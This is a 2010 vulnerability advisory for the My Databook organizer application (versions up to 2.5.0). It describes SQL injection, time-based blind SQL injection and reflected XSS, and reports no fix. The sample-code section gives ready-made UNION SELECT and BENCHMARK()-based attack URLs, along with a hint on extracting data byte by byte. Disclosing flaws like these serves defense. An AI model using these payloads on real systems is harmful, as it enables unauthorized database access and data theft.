My Databook <= 2.5.0 Multiple Remote Vulnerabilities

Name              My Databook
Vendor            http://www.mealex.com
Versions Affected <= 2.5.0

Author            Salvatore Fresta aka Drosophila
Website           http://www.salvatorefresta.net
Contact           salvatorefresta [at] gmail [dot] com

Date              2010-06-30

X. INDEX

I.   ABOUT THE APPLICATION
II.  DESCRIPTION
III. ANALYSIS
IV.  SAMPLE CODE
V.   FIX

I. ABOUT THE APPLICATION

My DataBook is a personal organizer/planner. Features include e-mail reminders, a calendar, a journal, appointments, and contacts.

II. DESCRIPTION

User-supplied input is not properly sanitised before being used in SQL queries or echoed back into HTML pages. This allows SQL injection (including time-based blind injection) and reflected cross-site scripting.

III. ANALYSIS

Summary:
A) Multiple SQL Injection
B) Multiple Blind SQL Injection
C) Reflected XSS

A) Multiple SQL Injection

Request parameters (for example the ID parameter of print.php and edit_contact.php) are not properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code, e.g. a UNION SELECT whose column values are rendered in the page.

B) Multiple Blind SQL Injection

Where the unsanitised value lands inside a quoted string in the query, the same flaw can be exploited as a time-based blind SQL injection: a conditional BENCHMARK() call delays the response only when an attacker-chosen condition holds, so data can be extracted one byte at a time even though query results are not displayed. Successful exploitation requires that "magic_quotes_gpc" is disabled, because the payload must contain a single quote to close the string literal.

C) Reflected XSS

Many input fields are printed back into the page without checking for HTML/JavaScript tags. This allows an attacker to inject arbitrary HTML and script that is rendered in the browser of a user who follows a crafted link.

IV. SAMPLE CODE

A) Multiple SQL Injection

http://site/path/print.php?Sec=contacts&ID=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30

http://site/path/edit_contact.php?Sec=contacts&ID=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30

B) Multiple Blind SQL Injection

http://site/path/edit_contact.php?Sec=contacts&ID=-1' OR IF(ASCII((SELECT CHAR(90))) = 90, BENCHMARK(10000000, MD5(0x90)), NULL)%23&Mod=Y

(The condition ASCII(CHAR(90)) = 90 is always true, so a noticeably delayed response confirms the injection; replacing the inner SELECT with a query against application data turns it into a byte-by-byte extraction oracle.)

C) Reflected XSS

http://site/path/edit_contact.php?Sec=contacts&ID=1">

V. FIX

No Fix.